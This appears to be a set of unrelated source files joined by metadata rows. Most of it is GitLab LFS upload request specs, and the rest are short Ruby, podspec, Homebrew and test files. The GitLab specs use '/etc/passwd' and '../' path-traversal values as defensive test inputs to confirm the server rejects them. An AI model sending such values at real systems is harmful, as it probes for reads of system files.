expect(json_response['objects'].first['oid']).to eq(sample_oid)
expect(json_response['objects'].first['size']).to eq(sample_size)
expect(lfs_object.projects.pluck(:id)).not_to include(project.id)
expect(lfs_object.projects.pluck(:id)).to include(other_project.id)
expect(json_response['objects'].first['actions']['upload']['href']).to eq("#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}/#{sample_size}")
expect(json_response['objects'].first['actions']['upload']['header']).to eq('Authorization' => authorization)
end
end
context 'when pushing a lfs object that does not exist' do
it_behaves_like 'pushes new LFS objects'
end
context 'when pushing one new and one existing lfs object' do
let(:body) do
{
'operation' => 'upload',
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 },
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
let(:update_lfs_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with upload hypermedia link for the new object' do
expect(json_response['objects']).to be_kind_of(Array)
expect(json_response['objects'].first['oid']).to eq("91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897")
expect(json_response['objects'].first['size']).to eq(1575078)
expect(json_response['objects'].first['actions']['upload']['href']).to eq("#{project.http_url_to_repo}/gitlab-lfs/objects/91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897/1575078")
expect(json_response['objects'].first['actions']['upload']['header']).to eq("Authorization" => authorization)
expect(json_response['objects'].last['oid']).to eq(sample_oid)
expect(json_response['objects'].last['size']).to eq(sample_size)
expect(json_response['objects'].last).not_to have_key('actions')
end
end
end
context 'when user does not have push access' do
let(:authorization) { authorize_user }
it 'responds with 403' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'when build is authorized' do
let(:authorization) { authorize_ci_project }
context 'build has an user' do
let(:user) { create(:user) }
context 'tries to push to own project' do
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'tries to push to other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
# I'm not sure what this tests that is different from the previous test
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'when deploy key has project push access' do
let(:key) { create(:deploy_key) }
let(:authorization) { authorize_deploy_key }
let(:update_user_permissions) do
project.deploy_keys_projects.create(deploy_key: key, can_push: true)
end
it_behaves_like 'pushes new LFS objects'
end
end
context 'when user is not authenticated' do
context 'when user has push access' do
let(:update_user_permissions) do
project.add_master(user)
end
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
context 'when user does not have push access' do
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
end
end
describe 'unsupported' do
let(:project) { create(:project) }
let(:authorization) { authorize_user }
let(:body) do
{
'operation' => 'other',
'objects' => [
{ 'oid' => sample_oid,
'size' => sample_size }
]
}
end
it 'responds with status 404' do
expect(response).to have_gitlab_http_status(404)
end
end
end
describe 'when handling lfs batch request on a read-only GitLab instance' do
let(:authorization) { authorize_user }
let(:project) { create(:project) }
let(:path) { "#{project.http_url_to_repo}/info/lfs/objects/batch" }
let(:body) do
{ 'objects' => [{ 'oid' => sample_oid, 'size' => sample_size }] }
end
before do
allow(Gitlab::Database).to receive(:read_only?) { true }
project.add_master(user)
enable_lfs
end
it 'responds with a 200 message on download' do
post_lfs_json path, body.merge('operation' => 'download'), headers
expect(response).to have_gitlab_http_status(200)
end
it 'responds with a 403 message on upload' do
post_lfs_json path, body.merge('operation' => 'upload'), headers
expect(response).to have_gitlab_http_status(403)
expect(json_response).to include('message' => 'You cannot write to this read-only GitLab instance.')
end
end
describe 'when pushing a lfs object' do
before do
enable_lfs
end
shared_examples 'unauthorized' do
context 'and request is sent by gitlab-workhorse to authorize the request' do
before do
put_authorize
end
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
context 'and request is sent by gitlab-workhorse to finalize the upload' do
before do
put_finalize
end
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
context 'and request is sent with a malformed headers' do
before do
put_finalize('/etc/passwd')
end
it 'does not recognize it as a valid lfs command' do
expect(response).to have_gitlab_http_status(401)
end
end
end
shared_examples 'forbidden' do
context 'and request is sent by gitlab-workhorse to authorize the request' do
before do
put_authorize
end
it 'responds with 403' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'and request is sent by gitlab-workhorse to finalize the upload' do
before do
put_finalize
end
it 'responds with 403' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'and request is sent with a malformed headers' do
before do
put_finalize('/etc/passwd')
end
it 'does not recognize it as a valid lfs command' do
expect(response).to have_gitlab_http_status(403)
end
end
end
describe 'to one project' do
let(:project) { create(:project) }
describe 'when user is authenticated' do
let(:authorization) { authorize_user }
describe 'when user has push access to the project' do
before do
project.add_developer(user)
end
context 'and the request bypassed workhorse' do
it 'raises an exception' do
expect { put_authorize(verified: false) }.to raise_error JWT::DecodeError
end
end
context 'and request is sent by gitlab-workhorse to authorize the request' do
shared_examples 'a valid response' do
before do
put_authorize
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'uses the gitlab-workhorse content type' do
expect(response.content_type.to_s).to eq(Gitlab::Workhorse::INTERNAL_API_CONTENT_TYPE)
end
end
shared_examples 'a local file' do
it_behaves_like 'a valid response' do
it 'responds with status 200, location of lfs store and object details' do
expect(json_response['TempPath']).to eq(LfsObjectUploader.workhorse_local_upload_path)
expect(json_response['RemoteObject']).to be_nil
expect(json_response['LfsOid']).to eq(sample_oid)
expect(json_response['LfsSize']).to eq(sample_size)
end
end
end
context 'when using local storage' do
it_behaves_like 'a local file'
end
context 'when using remote storage' do
context 'when direct upload is enabled' do
before do
stub_lfs_object_storage(enabled: true, direct_upload: true)
end
it_behaves_like 'a valid response' do
it 'responds with status 200, location of lfs remote store and object details' do
expect(json_response['TempPath']).to eq(LfsObjectUploader.workhorse_local_upload_path)
expect(json_response['RemoteObject']).to have_key('ID')
expect(json_response['RemoteObject']).to have_key('GetURL')
expect(json_response['RemoteObject']).to have_key('StoreURL')
expect(json_response['RemoteObject']).to have_key('DeleteURL')
expect(json_response['LfsOid']).to eq(sample_oid)
expect(json_response['LfsSize']).to eq(sample_size)
end
end
end
context 'when direct upload is disabled' do
before do
stub_lfs_object_storage(enabled: true, direct_upload: false)
end
it_behaves_like 'a local file'
end
end
end
context 'and request is sent by gitlab-workhorse to finalize the upload' do
before do
put_finalize
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'lfs object is linked to the project' do
expect(lfs_object.projects.pluck(:id)).to include(project.id)
end
end
context 'and workhorse requests upload finalize for a new lfs object' do
before do
lfs_object.destroy
end
context 'with object storage disabled' do
it "doesn't attempt to migrate file to object storage" do
expect(ObjectStorage::BackgroundMoveWorker).not_to receive(:perform_async)
put_finalize(with_tempfile: true)
end
end
context 'with object storage enabled' do
context 'and direct upload enabled' do
let!(:fog_connection) do
stub_lfs_object_storage(direct_upload: true)
end
['123123', '../../123123'].each do |remote_id|
context "with invalid remote_id: #{remote_id}" do
subject do
put_finalize(with_tempfile: true, args: {
'file.remote_id' => remote_id
})
end
it 'responds with status 403' do
subject
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'with valid remote_id' do
before do
fog_connection.directories.get('lfs-objects').files.create(
key: 'tmp/upload/12312300',
body: 'content'
)
end
subject do
put_finalize(with_tempfile: true, args: {
'file.remote_id' => '12312300',
'file.name' => 'name'
})
end
it 'responds with status 200' do
subject
expect(response).to have_gitlab_http_status(200)
end
it 'schedules migration of file to object storage' do
subject
expect(LfsObject.last.projects).to include(project)
end
it 'have valid file' do
subject
expect(LfsObject.last.file_store).to eq(ObjectStorage::Store::REMOTE)
expect(LfsObject.last.file).to be_exists
end
end
end
context 'and background upload enabled' do
before do
stub_lfs_object_storage(background_upload: true)
end
it 'schedules migration of file to object storage' do
expect(ObjectStorage::BackgroundMoveWorker).to receive(:perform_async).with('LfsObjectUploader', 'LfsObject', :file, kind_of(Numeric))
put_finalize(with_tempfile: true)
end
end
end
end
context 'invalid tempfiles' do
before do
lfs_object.destroy
end
it 'rejects slashes in the tempfile name (path traversal)' do
put_finalize('../bar', with_tempfile: true)
expect(response).to have_gitlab_http_status(403)
end
end
end
describe 'and user does not have push access' do
before do
project.add_reporter(user)
end
it_behaves_like 'forbidden'
end
end
context 'when build is authorized' do
let(:authorization) { authorize_ci_project }
context 'build has an user' do
let(:user) { create(:user) }
context 'tries to push to own project' do
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
before do
project.add_developer(user)
put_authorize
end
it 'responds with 403 (not 404 because the build user can read the project)' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'tries to push to other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
before do
put_authorize
end
it 'responds with 404 (do not leak non-public project existence)' do
expect(response).to have_gitlab_http_status(404)
end
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
before do
put_authorize
end
it 'responds with 404 (do not leak non-public project existence)' do
expect(response).to have_gitlab_http_status(404)
end
end
end
context 'for unauthenticated' do
it_behaves_like 'unauthorized'
end
end
describe 'to a forked project' do
let(:upstream_project) { create(:project, :public) }
let(:project_owner) { create(:user) }
let(:project) { fork_project(upstream_project, project_owner) }
describe 'when user is authenticated' do
let(:authorization) { authorize_user }
describe 'when user has push access to the project' do
before do
project.add_developer(user)
end
context 'and request is sent by gitlab-workhorse to authorize the request' do
before do
put_authorize
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'with location of lfs store and object details' do
expect(json_response['TempPath']).to eq(LfsObjectUploader.workhorse_local_upload_path)
expect(json_response['LfsOid']).to eq(sample_oid)
expect(json_response['LfsSize']).to eq(sample_size)
end
end
context 'and request is sent by gitlab-workhorse to finalize the upload' do
before do
put_finalize
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'lfs object is linked to the source project' do
expect(lfs_object.projects.pluck(:id)).to include(upstream_project.id)
end
end
end
describe 'and user does not have push access' do
it_behaves_like 'forbidden'
end
end
context 'when build is authorized' do
let(:authorization) { authorize_ci_project }
before do
put_authorize
end
context 'build has an user' do
let(:user) { create(:user) }
context 'tries to push to own project' do
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
context 'tries to push to other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
# I'm not sure what this tests that is different from the previous test
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'does not have user' do
let(:build) { create(:ci_build, :running, pipeline: pipeline) }
it 'responds with 403 (not 404 because project is public)' do
expect(response).to have_gitlab_http_status(403)
end
end
end
context 'for unauthenticated' do
it_behaves_like 'unauthorized'
end
describe 'and second project not related to fork or a source project' do
let(:second_project) { create(:project) }
let(:authorization) { authorize_user }
before do
second_project.add_master(user)
upstream_project.lfs_objects << lfs_object
end
context 'when pushing the same lfs object to the second project' do
before do
put "#{second_project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}/#{sample_size}", nil,
headers.merge('X-Gitlab-Lfs-Tmp' => lfs_tmp_file).compact
end
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'links the lfs object to the project' do
expect(lfs_object.projects.pluck(:id)).to include(second_project.id, upstream_project.id)
end
end
end
end
def put_authorize(verified: true)
authorize_headers = headers
authorize_headers.merge!(workhorse_internal_api_request_header) if verified
put "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}/#{sample_size}/authorize", nil, authorize_headers
end
def put_finalize(lfs_tmp = lfs_tmp_file, with_tempfile: false, args: {})
upload_path = LfsObjectUploader.workhorse_local_upload_path
file_path = upload_path + '/' + lfs_tmp if lfs_tmp
if with_tempfile
FileUtils.mkdir_p(upload_path)
FileUtils.touch(file_path)
end
extra_args = {
'file.path' => file_path,
'file.name' => File.basename(file_path)
}
put_finalize_with_args(args.merge(extra_args).compact)
end
def put_finalize_with_args(args)
put "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}/#{sample_size}", args, headers
end
def lfs_tmp_file
"#{sample_oid}012345678"
end
end
def enable_lfs
allow(Gitlab.config.lfs).to receive(:enabled).and_return(true)
end
def authorize_ci_project
ActionController::HttpAuthentication::Basic.encode_credentials('gitlab-ci-token', build.token)
end
def authorize_user
ActionController::HttpAuthentication::Basic.encode_credentials(user.username, user.password)
end
def authorize_deploy_key
ActionController::HttpAuthentication::Basic.encode_credentials("lfs+deploy-key-#{key.id}", Gitlab::LfsToken.new(key).token)
end
def authorize_user_key
ActionController::HttpAuthentication::Basic.encode_credentials(user.username, Gitlab::LfsToken.new(user).token)
end
def post_lfs_json(url, body = nil, headers = nil)
post(url, body.try(:to_json), (headers || {}).merge('Content-Type' => LfsRequest::CONTENT_TYPE))
end
def json_response
@json_response ||= JSON.parse(response.body)
end
end
| 32.945363 | 210 | 0.570493 |
e83105c62fe7971c9d5307c775427e30bc2a915a | 143 | module OfficeUiFabric
module Rails
FABRIC_CORE_VERSION = "4.0.0"
FABRIC_JS_VERSION = "3.0.0-beta2"
VERSION = "4.0.0.2"
end
end
| 17.875 | 37 | 0.664336 |
6ab067120e5a68e0fabd866fc121747ef7bddc05 | 626 | Pod::Spec.new do |s|
s.name = 'VOLoginCommponet'
s.ios.deployment_target = "9.0"
s.version = '1.1.2'
s.license = "Copyright (c) 2018年 Gavin. All rights reserved."
s.homepage = 'https://github.com/feidaoGavin/VOLoginCommponet.git'
s.summary = 'VOLoginCommponet登录模块'
s.author = '[email protected]'
s.source = {
:git => 'https://github.com/feidaoGavin/VOLoginCommponet.git',
:tag => s.version.to_s
}
s.requires_arc = true
s.source_files = 'VOLoginCommponet', 'VOLoginCommponet/**/*.{h,m}'
s.dependency 'AFNetworking', '3.1.0'
s.dependency 'VOToleranceTool', '0.0.2'
end
| 34.777778 | 71 | 0.664537 |
2672ca127d7cae9418cb227cd407f41101c00693 | 472 | class FontBigShouldersStencilText < Formula
head "https://github.com/google/fonts/raw/main/ofl/bigshouldersstenciltext/BigShouldersStencilText%5Bwght%5D.ttf", verified: "github.com/google/fonts/"
desc "Big Shoulders Stencil Text"
desc "Superfamily of condensed American Gothic typefaces"
homepage "https://fonts.google.com/specimen/Big+Shoulders+Stencil+Text"
def install
(share/"fonts").install "BigShouldersStencilText[wght].ttf"
end
test do
end
end
| 39.333333 | 153 | 0.78178 |
26d2258cd865eb7a26b521e8f5e9114e73540dd0 | 1,047 | name "pip3"
default_version "21.3.1"
dependency "setuptools3"
source :url => "https://github.com/pypa/pip/archive/#{version}.tar.gz",
:sha256 => "cbfb6a0b5bc2d1e4b4647729ee5b944bb313c8ffd9ff83b9d2e0f727f0c79714",
:extract => :seven_zip
relative_path "pip-#{version}"
build do
license "MIT"
license_file "https://raw.githubusercontent.com/pypa/pip/main/LICENSE.txt"
if ohai["platform"] == "windows"
python_bin = "#{windows_safe_path(python_3_embedded)}\\python.exe"
python_prefix = "#{windows_safe_path(python_3_embedded)}"
else
python_bin = "#{install_dir}/embedded/bin/python3"
python_prefix = "#{install_dir}/embedded"
end
command "#{python_bin} setup.py install --prefix=#{python_prefix}"
if ohai["platform"] != "windows"
block do
FileUtils.rm_f(Dir.glob("#{install_dir}/embedded/lib/python3.*/site-packages/pip-*-py3.*.egg/pip/_vendor/distlib/*.exe"))
FileUtils.rm_f(Dir.glob("#{install_dir}/embedded/lib/python3.*/site-packages/pip/_vendor/distlib/*.exe"))
end
end
end
| 31.727273 | 127 | 0.707736 |
183240f488c8695ceba45174ff0478ad4e1281d5 | 1,305 | module JSON
class Schema
class OneOfAttribute < Attribute
def self.validate(current_schema, data, fragments, processor, validator, options = {})
validation_errors = 0
current_schema.schema['oneOf'].each do |element|
schema = JSON::Schema.new(element,current_schema.uri,validator)
begin
# need to raise exceptions on error because
# schema.validate doesn't reliably return true/false
schema.validate(data,fragments,processor,options.merge(:record_errors => false))
rescue ValidationError
validation_errors += 1
end
end
case validation_errors
when current_schema.schema['oneOf'].length - 1 # correct, matched only one
message = nil
when current_schema.schema['oneOf'].length # didn't match any
message = "The property '#{build_fragment(fragments)}' of type #{data.class} did not match any of the required schemas"
else # too many matches
message = "The property '#{build_fragment(fragments)}' of type #{data.class} matched more than one of the required schemas"
end
validation_error(processor, message, fragments, current_schema, self, options[:record_errors]) if message
end
end
end
end
| 39.545455 | 133 | 0.658238 |
1c08ab9bbef8272a86bf247994942332ff4e1c84 | 131 | # frozen_string_literal: true
module CXML
class SupplierSetup < DocumentNode
accessible_nodes %i[
url
]
end
end
| 13.1 | 36 | 0.694656 |
bf00033b781d4f23f72b2efb9cfd105a57f03225 | 2,408 | require "spec_helper"
require "mvcli/validatable"
describe "a validator" do
use_natural_assertions
Given(:object) { Object.new }
Given(:validator) { MVCLI::Validatable::Validator.new }
Given(:validation) { validator.validate object }
Given(:violations) { validation.violations }
context "when it validates a field that does not exist on the object" do
Given { validator.validates(:does_not_exist, "invalid") {} }
When(:validation) { validator.validate object }
Then { not validation.errors[:does_not_exist].empty? }
Then { not validation.valid? }
end
describe "validating a child" do
Given { validator.validates_child(:some_child) }
context "when it is nil" do
When(:validation) { validator.validate(double(:Object, :some_child => nil)) }
Then { validation.valid? }
end
context "when it does not exist" do
When(:validation) { validator.validate(Object.new) }
Then { not validation.errors[:some_child].nil? }
And { not validation.valid? }
end
end
describe "validating a nil field" do
Given { object.stub(:property) {nil} }
context "when the validate-on-nil option is passed" do
When { validator.validates(:property, "check nil", nil: true) {false} }
Then { not validation.valid? }
And { not validation.violations[:property].empty? }
end
context "when the validate on nil option is not passed" do
When { validator.validates(:property, "check nil") {false}}
Then { validation.valid? }
end
end
describe "validating each element in an enumerable" do
Given { validator.validates(:foodles, "invalid", nil: true) {|foodle| not foodle.nil? } }
context "when there are invalid elements in the enumerable" do
When { object.stub(:foodles) {["not nil", nil, "not nil"]} }
Then { not validation.valid? }
Then { violations.has_key? "foodles[1]" }
And { not violations.has_key? "foodles"}
end
end
describe "validating an enumerable itself" do
Given { object.stub(:array) {array} }
Given { validator.validates(:array, "invalid", each: false) {|a| a.length < 3} }
context "when it is valid" do
When(:array) { [1,2] }
Then { validation.valid? }
end
context "when it is invalid" do
When(:array) { [1,2,3] }
Then { not validation.valid? }
And {not violations["array"].empty?}
end
end
end
| 35.940299 | 93 | 0.659053 |
79d66660f6346fae3540f3c26229f6a525c7e096 | 749 | # frozen_string_literal: true
Rails.application.routes.draw do
devise_for :fans, :controllers => {:sessions => "sessions"}
namespace :last_fm do
resource :connection, :only => %i[ new show destroy ]
end
get "/auth/spotify/callback", :to => "spotify/connections#create"
namespace :spotify do
resource :connection, :only => %i[ destroy ]
end
namespace :my do
resource :dashboard, :only => :show
resource :account, :only => %i[ show update destroy ]
resources :albums, :only => [] do
resource :purchases, :only => %i[ create destroy ]
end
get "/purchases/:fan_uuid/:album_uuid" => "purchases#new",
:as => :purchase # rubocop:disable Layout/HashAlignment
end
root :to => "home#index"
end
| 25.827586 | 67 | 0.655541 |
62e654e1361c92ca970864d8dcc56975fff81710 | 1,428 | class AvailabilityStatusUpdateJob < ApplicationJob
queue_as :availability
def perform(event, headers)
payload = JSON.parse(event)
model_class = payload["resource_type"].classify.constantize
validate_resource_type(model_class)
record_id = payload["resource_id"]
object = model_class.find(record_id)
options = {
:availability_status => payload["status"],
:last_checked_at => Time.now.utc
}
options[:availability_status_error] = payload["error"] if %(Endpoint Application Authentication).include?(model_class.name)
options[:last_available_at] = options[:last_checked_at] if options[:availability_status] == 'available'
object.update!(options)
object.raise_event_for_update(options.keys, headers)
rescue NameError
Sidekiq.logger.error("Invalid resource_type #{payload["resource_type"]}")
rescue ActiveRecord::RecordNotFound
Sidekiq.logger.error("Could not find #{model_class} with id #{record_id}")
rescue ActiveRecord::RecordInvalid
Sidekiq.logger.error("Invalid status #{payload["status"]}")
rescue => e
Sidekiq.logger.error(["Something is wrong when processing Kafka message: ", e.message, *e.backtrace].join($RS))
end
def validate_resource_type(model_class)
# For security reason only accept explicitly listed models
raise NameError unless [Application, Authentication, Endpoint, Source].include?(model_class)
end
end
| 36.615385 | 127 | 0.742297 |
61ccb73d69b1c9d7ee4e1d0498bfe8d408fae812 | 241 | # -*- encoding: utf-8 -*-
require_relative 'common'
require 'hexapdf/encryption/fast_arc4'
describe HexaPDF::Encryption::FastARC4 do
include ARC4EncryptionTests
before do
@algorithm_class = HexaPDF::Encryption::FastARC4
end
end
| 18.538462 | 52 | 0.755187 |
6a9e9582b3cb4458fce43293bea6f030c24ebc39 | 39 |
module Xample
VERSION = "0.0.1"
end
| 7.8 | 19 | 0.641026 |
5d5e515f8c092fbb120bb9053c1e494821725523 | 3,880 | # -*- coding: utf-8 -*-
require 'pp'
require 'ostruct'
require 'uri'
require '../lib/jekyll/msgcat'
# mock
module Site_ru
def initialize *a, &b
super
@context = OpenStruct.new("registers" => {
site: OpenStruct.new("config" => {
'msgcat' => {
'locale' => 'ru'
}
}),
page: {
'url' => '/foo/bar'
}
})
@context_orig = @context
end
end
require 'minitest/autorun'
class MsgcatTest < Minitest::Unit::TestCase
include Site_ru
include Jekyll::Msgcat
def setup
@context = @context_orig
# pp @context
end
def test_mc_empty
refute mc nil
assert_equal "", mc("")
end
def test_mc_no_msgcat_entry
@context.registers[:site].config['msgcat'] = nil
assert_equal "", mc("")
assert_equal "News", mc("News")
end
def test_mc
assert_equal "Новости", mc("News")
assert_equal "news", mc("news")
assert_equal "Напишите нам", mc("Write to Us")
end
def test_invalid_locale_name
@context.registers[:site].config['msgcat']['locale'] = 'uk'
out, err = capture_io do
assert_equal "News", mc("News")
end
assert_match(/msgcat warning: 'uk' wasn't found/, err)
end
def test_cur_page_in_another_locale__this_locale
assert_equal "<a href='#' class=' disabled'>ru</a>", cur_page_in_another_locale('ru')
end
def test_cur_page_in_another_locale__this_locale_custom_label
assert_equal "<a href='#' class=' disabled'>Booo</a>", cur_page_in_another_locale('ru', 'Booo')
end
def test_cur_page_in_another_locale__this_locale_custom_class
assert_equal "<a href='#' class='myclass1 myclass2 disabled'>ru</a>", cur_page_in_another_locale('ru', nil, "myclass1 myclass2")
end
def test_cur_page_in_another_locale__no_url_in_config
@context.registers[:site].config['url'] = nil
r = assert_raises(RuntimeError) do
cur_page_in_another_locale 'lt'
end
# pp r
assert_match(/bad argument/, r.to_s)
end
def test_cur_page_in_another_locale__domain_no_deploy
@context.registers[:site].config['msgcat']['deploy'] = nil
@context.registers[:site].config['url'] = 'http://lt.example.com'
assert_equal "<a href='http://lt.example.com/foo/bar' class=' '>lt</a>", cur_page_in_another_locale('lt')
end
def test_cur_page_in_another_locale__domain_no_deploy_no_msgcat
@context.registers[:site].config['msgcat'] = nil
@context.registers[:site].config['url'] = 'http://lt.example.com'
assert_equal "<a href='http://lt.example.com/foo/bar' class=' '>lt</a>", cur_page_in_another_locale('lt')
end
def test_cur_page_in_another_locale__domain
@context.registers[:site].config['msgcat']['deploy'] = 'domain'
@context.registers[:site].config['url'] = 'http://lt.example.com'
assert_equal "<a href='http://lt.example.com/foo/bar' class=' '>lt</a>", cur_page_in_another_locale('lt')
end
def test_cur_page_in_another_locale__nearby_no_baseurl
@context.registers[:site].config['msgcat']['deploy'] = 'nearby'
@context.registers[:site].config['url'] = '/blog/lt'
r = assert_raises(RuntimeError) do
cur_page_in_another_locale 'lt'
end
assert_match(/no 'baseurl' property/, r.to_s)
end
def test_cur_page_in_another_locale__nearby
@context.registers[:site].config['msgcat']['locale'] = 'uk'
@context.registers[:site].config['msgcat']['deploy'] = 'nearby'
@context.registers[:site].config['baseurl'] = '/blog/lt'
assert_equal "<a href='/blog/lt/foo/bar' class=' '>lt</a>", cur_page_in_another_locale('lt')
end
end
| 32.333333 | 132 | 0.621649 |
e9aefe91e18f32e7212c24afdd775dfcc361adc3 | 155 | class CreateEditors < ActiveRecord::Migration[6.0]
def change
create_table :editors do |t|
t.string :key
t.timestamps
end
end
end
| 15.5 | 50 | 0.658065 |
26d15d2fb717681ae3e4014f19555bfaf8a6be0b | 17,808 | require File.dirname(__FILE__) + '/../../spec_helper.rb'
describe "OracleEnhancedAdapter establish connection" do
it "should connect to database" do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Base.connection.should_not be_nil
ActiveRecord::Base.connection.class.should == ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter
end
it "should connect to database as SYSDBA" do
ActiveRecord::Base.establish_connection(SYS_CONNECTION_PARAMS)
ActiveRecord::Base.connection.should_not be_nil
ActiveRecord::Base.connection.class.should == ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter
end
it "should be active after connection to database" do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Base.connection.should be_active
end
it "should not be active after disconnection to database" do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Base.connection.disconnect!
ActiveRecord::Base.connection.should_not be_active
end
it "should be active after reconnection to database" do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Base.connection.reconnect!
ActiveRecord::Base.connection.should be_active
end
end
describe "OracleEnhancedAdapter schema dump" do
before(:all) do
if !defined?(RUBY_ENGINE)
@old_conn = ActiveRecord::Base.oracle_connection(CONNECTION_PARAMS)
@old_conn.class.should == ActiveRecord::ConnectionAdapters::OracleAdapter
elsif RUBY_ENGINE == 'jruby'
@old_conn = ActiveRecord::Base.jdbc_connection(JDBC_CONNECTION_PARAMS)
@old_conn.class.should == ActiveRecord::ConnectionAdapters::JdbcAdapter
end
@new_conn = ActiveRecord::Base.oracle_enhanced_connection(CONNECTION_PARAMS)
@new_conn.class.should == ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter
end
unless defined?(RUBY_ENGINE) && RUBY_ENGINE == "ruby" && RUBY_VERSION =~ /^1\.9/
it "should return the same tables list as original oracle adapter" do
@new_conn.tables.sort.should == @old_conn.tables.sort
end
it "should return the same index list as original oracle adapter" do
@new_conn.indexes('employees').sort_by(&:name).should == @old_conn.indexes('employees').sort_by(&:name)
end
it "should return the same pk_and_sequence_for as original oracle adapter" do
if @old_conn.respond_to?(:pk_and_sequence_for)
@new_conn.tables.each do |t|
@new_conn.pk_and_sequence_for(t).should == @old_conn.pk_and_sequence_for(t)
end
end
end
it "should return the same structure dump as original oracle adapter" do
@new_conn.structure_dump.should == @old_conn.structure_dump
end
it "should return the same structure drop as original oracle adapter" do
@new_conn.structure_drop.should == @old_conn.structure_drop
end
end
it "should return the character size of nvarchar fields" do
@new_conn.execute <<-SQL
CREATE TABLE nvarchartable (
session_id NVARCHAR2(255) DEFAULT NULL
)
SQL
if /.*session_id nvarchar2\((\d+)\).*/ =~ @new_conn.structure_dump
"#$1".should == "255"
end
@new_conn.execute "DROP TABLE nvarchartable"
end
end
describe "OracleEnhancedAdapter database stucture dump extentions" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
@conn.execute <<-SQL
CREATE TABLE nvarchartable (
unq_nvarchar NVARCHAR2(255) DEFAULT NULL
)
SQL
end
after(:all) do
@conn.execute "DROP TABLE nvarchartable"
end
it "should return the character size of nvarchar fields" do
if /.*unq_nvarchar nvarchar2\((\d+)\).*/ =~ @conn.structure_dump
"#$1".should == "255"
end
end
end
describe "OracleEnhancedAdapter database session store" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
@conn.execute <<-SQL
CREATE TABLE sessions (
id NUMBER(38,0) NOT NULL,
session_id VARCHAR2(255) DEFAULT NULL,
data CLOB DEFAULT NULL,
created_at DATE DEFAULT NULL,
updated_at DATE DEFAULT NULL,
PRIMARY KEY (ID)
)
SQL
@conn.execute <<-SQL
CREATE SEQUENCE sessions_seq MINVALUE 1 MAXVALUE 999999999999999999999999999
INCREMENT BY 1 START WITH 10040 CACHE 20 NOORDER NOCYCLE
SQL
if ENV['RAILS_GEM_VERSION'] >= '2.3'
@session_class = ActiveRecord::SessionStore::Session
else
@session_class = CGI::Session::ActiveRecordStore::Session
end
end
after(:all) do
@conn.execute "DROP TABLE sessions"
@conn.execute "DROP SEQUENCE sessions_seq"
end
it "should create sessions table" do
ActiveRecord::Base.connection.tables.grep("sessions").should_not be_empty
end
it "should save session data" do
@session = @session_class.new :session_id => "111111", :data => "something" #, :updated_at => Time.now
@session.save!
@session = @session_class.find_by_session_id("111111")
@session.data.should == "something"
end
it "should change session data when partial updates enabled" do
return pending("Not in this ActiveRecord version") unless @session_class.respond_to?(:partial_updates=)
@session_class.partial_updates = true
@session = @session_class.new :session_id => "222222", :data => "something" #, :updated_at => Time.now
@session.save!
@session = @session_class.find_by_session_id("222222")
@session.data = "other thing"
@session.save!
# second save should call again blob writing callback
@session.save!
@session = @session_class.find_by_session_id("222222")
@session.data.should == "other thing"
end
it "should have one enhanced_write_lobs callback" do
return pending("Not in this ActiveRecord version") unless @session_class.respond_to?(:after_save_callback_chain)
